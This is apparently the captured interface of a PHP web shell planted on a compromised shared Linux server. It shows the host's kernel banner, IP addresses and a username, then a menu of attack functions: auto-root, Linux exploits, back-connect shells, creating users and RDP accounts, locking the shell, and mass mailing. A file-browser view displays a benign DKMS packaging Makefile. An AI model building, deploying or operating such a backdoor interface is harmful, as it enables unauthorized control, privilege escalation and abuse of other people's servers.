Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
dkms /
template-dkms-mkdeb /
[ HOME SHELL ]
Name
Size
Permission
Action
debian
[ DIR ]
drwxr-xr-x
Makefile
699
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
#/usr/bin/make SRC = $(DESTDIR)/usr/src SHARE = $(DESTDIR)/usr/share/$(NAME)-dkms all: clean: install: #source tree ifeq ("$(wildcard $(NAME)-$(VERSION))", "$(NAME)-$(VERSION)") install -d "$(SRC)" cp -a $(NAME)-$(VERSION) $(SRC) chmod 644 -R "$(SRC)/$(NAME)-$(VERSION)" endif #tarball, possibly with binaries ifeq ("$(wildcard $(NAME)-$(VERSION).dkms.tar.gz)", "$(NAME)-$(VERSION).dkms.tar.gz") install -d "$(SHARE)" install -m 644 $(NAME)-$(VERSION).dkms.tar.gz "$(SHARE)" endif #postinst, only if we are supporting legacy mode ifeq ("$(wildcard common.postinst)", "common.postinst") install -d "$(SHARE)" install -m 755 $(PREFIX)/usr/lib/dkms/common.postinst $(SHARE)/postinst endif
Close